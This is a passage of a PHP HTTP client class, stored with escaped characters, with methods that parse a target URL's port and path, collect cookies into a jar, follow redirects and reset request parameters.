\npreg_match(\"/:(\\d+)\\//\",$urltarg,$matches); \n$this->port=empty($matches[1]) ? 80 : $matches[1]; \n \n$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)); \npreg_match(\"/\\/(.*)\\//\",$temp,$matches); \n$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\"); \n \nif($this->port > 65535) die(\"Error: Invalid port number\"); \n} \n \n \n/** \n* If you call this function, the script will \n* extract all \"Set-Cookie\" headers values \n* and it will automatically add them into the \"Cookie\" header \n* for all next requests. \n* \n* $this->cookiejar(1); // enabled \n* $this->cookiejar(0); // disabled \n* \n*/ \npublic function cookiejar($code) \n{ \nif($code===0) $this->cookiejar=''; \nif($code===1) $this->cookiejar=1; \nelse \n{ \n$this->getcookie($code); \n} \n} \n \n \n/** \n* If you call this function, the script will \n* follow all redirections sent by the server. 
\n* \n* $this->allowredirection(1); // enabled \n* $this->allowredirection(0); // disabled \n* \n* @return $this->get($locationresponse) \n*/ \npublic function allowredirection($code) \n{ \nif($code===0) $this->allowredirection=''; \nif($code===1) $this->allowredirection=1; \nelse \n{ \nif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr)) \n{ \n$location = str_replace(chr(13),'',$codearr[2]); \nif(!eregi(\"://\",$location)) \n{ \nreturn $this->get(\"http://\".$this->host.$this->path.$location); \n} \nelse \n{ \nreturn $this->get($location); \n} \n} \nelse \n{ \nreturn $code; \n} \n} \n} \n \n \n/** \n* This function allows you to reset some parameters: \n* \n* $this->reset(header); // headers cleaned \n* $this->reset(cookie); // cookies cleaned \n* $this->reset(); // clean all parameters \n* \n* @param string $func \n*/ \npublic function reset($func='') \n{ \nswitch($func) \n{ \ncase \"header\": \n$this->header=''; \nbreak; \n \ncase \"cookie\": \n$this->cookie=''; \nbreak; \n \ndefault: \n$this->cookiejar=''; \n$this->header=''; \n$this->cookie=''; \n$this->allowredirection=''; \n$this->agent=''; \nbreak; \n} \n} \n} \n?> \n \n`\n"}
{}